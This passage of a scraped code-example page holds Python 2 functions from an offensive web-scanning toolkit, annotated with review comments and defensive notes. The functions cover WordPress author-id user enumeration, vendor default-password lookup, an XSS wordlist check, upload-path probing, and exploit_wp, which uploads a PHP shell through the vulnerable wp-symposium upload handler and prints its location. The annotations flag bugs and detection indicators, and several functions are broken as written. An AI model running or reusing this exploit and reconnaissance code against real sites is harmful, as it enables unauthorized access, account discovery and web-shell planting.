    """Request ``author=1..usern`` from a site and list the users found.

    A target without ``http`` in it is tried over ``https://`` first and
    falls back to ``http://`` if that request raises. For each id the
    ``author`` parameter is sent through ``curllib`` and the reply is parsed
    by ``find_user`` (both defined elsewhere). Results are de-duplicated by
    ``sort_and_deduplicate`` and printed as user/name pairs.

    Defensive note: this is author-id enumeration. Sequential ``author=N``
    requests from one client are the log trace, and refusing or not
    redirecting such requests for anonymous visitors removes the signal the
    scan relies on (presumably the login slug in the reply -- ``find_user``
    is not shown).
    """
    results = []
    # Substring test, not a scheme check.
    if 'http' not in url:
        try:
            urllib2.urlopen('https://' + url)
            site = 'https://' + url
        # Bare except: any failure at all falls back to plain http.
        except:
            site = 'http://' + url
    else:
        site = url
    printf('[+] wait a minute, scanning (%s)' % site)
    for x in range(0, int(usern)):
        try:
            tmp = curllib(site, '', urllib.urlencode({"author": (x + 1)}))
            if tmp == False:

                continue
            tmp = find_user(tmp)
        # NOTE(review): every exception is swallowed, after which `tmp`
        # still holds the previous iteration's value (or is unbound on the
        # first pass) when it is read below.
        except:
            pass
        if len(tmp['user']):
            results.append(tmp)
    if not results:
        printf('[!] Could not find anything, maybe not vulnerable!')
        return
    results = sort_and_deduplicate(results)
    print("[+] Found " + str(len(results)) + " users in " + site + "")
    for i in range(0, len(results)):
        printf(' user: %s\n name: %s' %
               (results[i]['user'], results[i]['name']))
Ejemplo n.º 27
def default_pass(manufactor):
    """Look up vendor default credentials on defaultpassword.com and print them.

    The search page for *manufactor* is fetched and cut apart on its table
    markup; the vendor, product, protocol, user and password cells of each
    row are printed. Any ``IndexError`` while cutting ends the listing with
    a "no results" message.

    Defensive note: a lookup like this is how an inventory audit confirms
    which devices ship with known defaults; any device still answering to
    one of the listed pairs needs its credentials changed.
    """
    x = {}  # never used
    # NOTE(review): plain http, and `manufactor` is concatenated without
    # URL-encoding; the reply can be altered in transit.
    search_link = "http://www.defaultpassword.com/?action=dpl&char=" + manufactor
    printf('[+] Searching for passwords.')
    req = requests.get(search_link)
    html = req.content
    result = html.split('<TR VALIGN="top">')
    try:
        # Drop the two leading chunks before the first data row; pop()
        # raises IndexError when the page has fewer chunks than that.
        result.pop(0)
        result.pop(0)
        for line in result:
            spliting = line.split('<TD NOWRAP>')
            string = ''  # never used
            for element in spliting:
                # The same fixed cell positions are re-read for every
                # non-empty cell; the values do not depend on `element`.
                if "</TD>" in element and element.strip() != '':
                    # Overwrites the function argument with the row's value.
                    manufactor = spliting[1].split('</TD>')[0]
                    product = spliting[2].split('</TD>')[0]
                    protocol = spliting[4].split('</TD>')[0]
                    user = spliting[5].split('</TD>')[0]
                    password = spliting[6].split('</TD>')[0]
            # Runs once per row, with whatever the inner loop last assigned
            # (values carry over from the previous row if nothing matched).
            printf(
                '[+] Manufactor: %s\n[+] Product: %s\n[+] Protocol: %s\n[+] User: %s\n[+] Password: %s'
                % (manufactor, product, protocol, user, password))
    except IndexError:
        printf('[w] No results were found for this manufacturer.')
Ejemplo n.º 28
def xss(web):
    """Report wordlist strings that appear in the page at *web*.

    A target without ``http`` in it is tried over ``http://`` first and
    falls back to ``https://`` if that request raises. When the URL contains
    ``=``, the page is fetched once, unmodified, and each line of
    ``core/wordlist/xss.txt`` is searched for in the body,
    case-insensitively.

    NOTE(review): no wordlist entry is ever sent to the server, so a match
    only shows that the string already occurs in the page; it is not
    evidence of reflected input. As written the function also cannot run to
    completion: ``printtf`` is not defined in this block, ``len(vuln)`` is
    applied to an int, and the Python 2 print statement below is mixed with
    function-style calls.
    """
    vuln = 0
    # NOTE(review): the wordlist file object is never closed.
    payloads = open('core/wordlist/xss.txt')
    # Substring test, not a scheme check.
    if 'http' not in web:
        try:
            requests.get('http://' + web)
            url = 'http://' + web
        # Bare except: any failure at all switches the scheme to https.
        except:
            url = 'https://' + web
    else:
        url = web
    if '=' in url:
        printtf('[+] Scanning (%s)' % url)
        r = requests.get(url)
        content = r.text
        for payload in payloads:
            if payload.strip().lower() in content.lower():
                # `payload` still carries its trailing newline here.
                print(" XSS Vulnerable: " + url + payload)
                vuln += 1
        if len(vuln) == 0:
            print "[!] Not vulnerable!"
    else:
        printf('[!] No parameter found!')
Ejemplo n.º 29
def upload(web):
    """Request each path from the upload wordlist and report HTTP 200 hits.

    ``core/wordlist/upload.txt`` holds ``label:path`` lines. Every path is
    requested under the parsed base URL, and a label is marked ``Vuln``
    whenever the reply status is 200.

    Defensive note: the only evidence used is the status code, so a site
    that answers 200 for missing pages is reported as vulnerable throughout,
    and a hit says nothing about whether the endpoint accepts uploads. The
    server-side trace is a burst of GETs for upload-handler paths.
    """
    payloads = {}
    # NOTE(review): the wordlist file object is never closed explicitly.
    path = open('core/wordlist/upload.txt', 'r').readlines()
    url = parse(web)
    printf('[+] scanning (%s)' % url)
    for i in path:
        # Only the first two ":"-separated fields are used, so a path that
        # itself contains ":" is cut short.
        x = i.strip().split(':')
        try:
            # A repeated label overwrites the earlier path.
            payloads.update({x[0]: x[1]})
        # Lines without a ":" are skipped.
        except IndexError:
            pass
    for i in payloads:
        r = requests.get(url + '/' + payloads[i])
        if r.status_code == 200:
            printf(' %s [\033[92mVuln\033[0m]' % i)
            printf('  => link: %s' % r.url)
        else:
            printf(' %s [\033[91mNot Vuln\033[0m]' % i)
def exploit_wp(url, file):
    """POST *file* to the wp-symposium upload handler and report the result.

    A target without ``http`` in it is tried over ``http://`` first and
    falls back to ``https://`` if that request raises. The multipart body is
    built by ``create`` with two names from ``id_gen`` (both defined
    elsewhere) and sent to ``/wp-content/plugins/wp-symposium/server/php/
    index.php``. The upload counts as successful unless the reply contains
    ``error`` or is ``0`` or empty.

    Defensive note: POSTs to that ``server/php/index.php`` path, and new
    ``.php`` files appearing beneath it, are the indicators to look for.
    Updating or removing the plugin and denying script execution under
    upload directories is the remedy.
    """
    # Substring test, not a scheme check.
    if 'http' not in url:
        try:
            urllib2.urlopen('http://' + url)
            site = 'http://' + url
        # Bare except: any failure at all switches the scheme to https.
        except:
            site = 'https://' + url
    else:
        site = url
    printf('[+] create random directory and shell..')
    # NOTE(review): with `and`, the early return fires only when the path is
    # both not a regular file and not readable.
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        printf('[!] file is missing or not readable', 2)
        return
    # Process-wide default timeout for sockets created from here on.
    socket.setdefaulttimeout(10)
    url_upload = site + '/wp-content/plugins/wp-symposium/server/php/'
    content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
    rand_dirname = id_gen()
    rand_shellname = id_gen()
    body = create(file, rand_dirname, rand_shellname, url_upload)
    headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/36.0.1985.125 Safari/537.36',
        'content-type': content_type,
        'content-length': str(len(body))
    }
    printf('[+] start upload %s to %s' % (file, site))
    req = urllib2.Request(url_upload + 'index.php', body, headers)
    # An HTTP error status raises here and is not caught.
    response = urllib2.urlopen(req)
    read = response.read()
    # Success is inferred from the response text only; the uploaded file is
    # not requested back.
    if "error" in read or read == "0" or read == "":
        printf('[!] upload failed, maybe site isn\'t vulnerable!')
    else:
        printf('[+] success uploaded')
        printf('[+] location %s' % url_upload + rand_dirname + rand_shellname +
               '.php')